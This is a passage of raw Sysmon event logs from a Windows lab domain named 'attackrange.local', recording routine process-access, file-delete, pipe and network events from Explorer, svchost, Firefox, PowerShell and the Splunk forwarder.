08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.076{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:04.076{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.076{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.076{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:04.076{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:05.877{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C9D4C3FEB48F71B4AB5ACCAA1DEBF7,SHA256=D4013E211DFE7DF96BD6817A42155842A8E00D19DF43733C1F2991E4D645ECE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810420Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:05.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38D87E1A14FF4C466FD16DBD324A0C08,SHA256=D0142AB4AF2923C9E5504B37C4763408268904BD53390B047084B325903E442E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:56.617{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61973-false10.0.1.12-8000- 354300x8000000000000000810419Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:03.205{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57466-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:06.877{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24D5F62B62108DB5B56356BE31FDF565,SHA256=46F7CB5B07034DDB01554D031B13A9E7D515ADB909690154661D494E47F84522,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810424Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:06.559{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668C3C44B8405A8F24B26098CD9F6C01,SHA256=94AD872148815091F6A10056135A56D9DD7075439AE3246BB9E12D19286C09CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:06.546{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:06.476{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001054876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:06.476{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla 
Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001054875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:08:06.476{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.377.157462496C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001054874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:08:06.476{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.377.157462496C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000810423Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:06.262{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810422Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:06.262{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810421Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:06.262{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:07.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F68C1A4D917BAD0BB3C8452F01C69E6E,SHA256=A3C04B9F8500B489E1B3DF95A2BF96B362706061EB6FC967A429849CB50595B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810425Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:07.606{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E81EC67CBE9B1E5E6910F169C7780335,SHA256=3E223AE692AB473B28AFF92EDC1A7D58EFE6D29B72F344325705067FA1E7CE21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:08.892{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=249F605EB81F88C446B31166D623EFC2,SHA256=967E1A262B10517D964DE36569EF1E86B12CEECFB9B0DDA9D5B06ED090369273,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810426Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:08.653{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30DDFCE4D40B10A12C3133C456BC43F8,SHA256=CAD19FFD26E169C325DBA3532BF3AB2368B357FE3443DDC8B8BE7C1E9A31FC7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:08.661{466BC892-F862-60EB-F97D-00000000CF01}9624ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:09.894{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ED63D211692A9775BFD34C21B1A16F6,SHA256=D2FDE36DD93EB7552613092CF660962892BB629CDAED4C777392A54AD782E586,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810427Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:09.731{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71DC00FEF52B8294B7B781126C3C0DCD,SHA256=3BCE6D1928B28BFB3B809A71899F732EB0202DCFF2E6D5FA0D05653A8EAF6E06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:09.663{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E9A13BA7C2D09342A3A5947642FE0929,SHA256=684BBEFCF2EC48E8EC2C74D8624B4FBEED33A95088EBAE44E34B550E8D46DF71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:10.909{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6007A54471F30125130B2BE4E67B503D,SHA256=C807D68A9DF0C013C333A14B35170976B0AFABCE67E3F1EA44C7AD28A90341DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810429Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:10.746{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE3852F91D613AC0249154A2FE4DCB32,SHA256=C7CA39E4BF5E25BE6E39D3F3324F0BAC3E9B060E10FC34DC9DE94D4B35632CE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:01.619{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61974-false10.0.1.12-8000- 354300x8000000000000000810428Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:08.255{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57467-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.947{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90276EBE398E14573CD1FBFE43C85693,SHA256=69F2D5D927C33EE5991D5AAFA88F9C2874FAEFDECE5C0352A02E1D7AC4A35356,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810430Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:11.746{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A33A8A8011D6374A31CBBDC276CBF947,SHA256=81EA43CD8E65B733D6AE24A97FF2BD72E1FCB9BD21B90875F114B5823427DFD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4CCD3035C5B2F99A049C18B19F00B622,SHA256=565B1A477964634B8AE933A9A0D0A4F32C229D53EAEF2F62C95D9DD328E173B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BB7AA62B42CD83B53488601076B29B59,SHA256=E66B04B0B6361A280A501FD70D8F8B6EBE60BFFCDE5EEB1D747989BB1F7E1B60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8E9C669C2931E3F0575F030095C294A7,SHA256=A50DB4363098859E7D185ED663D5A64812464B9B2D45D3A3388365DBF01A37E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D369E8BA3DEBCE898762EBB43E121722,SHA256=9D51B7E91BAB4C8305B5ED71E672BF451D712BEF984E929941CEED480BBD8709,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=75DA1C2CC10BF6A096B4D131C3598B40,SHA256=9F9C326B526C3DC852781AFA3DB89800479E7814A0836A7FA3365550D941A320,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=62F9F57DB450E2AE01FF23F8B2563EFE,SHA256=BF2199233B38F2959EEFA18466B4B7DC241B19B1D33B7DEB6F1D32A61725252F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.347{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=17F426CAD8CA6DA34B756B0D3FD5A147,SHA256=03899F52ADFB713C8AA016EA15167240D751914703E0C17FE08B4A35D69E0FC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E688C5816DC261A6BA74CCE8ADC1C50C,SHA256=6AA36CFC9945192CECDA6EC351179E356DB22697196BB8667E2B719F1034DFC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.345{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4FA23FF18E6CB1312B18AE1CCA643E00,SHA256=7CFA3F522F8CBA58C335F3849D285107F0164CA9BA27BC2EC0D7C3C6F48E6665,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.344{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4A2ED5F22E8AF85121E67C4398DA6A5D,SHA256=EA1F4EE4E1552245B22B3695E014493510748B66914FBF895FDB12FB49E3A583,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:11.342{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 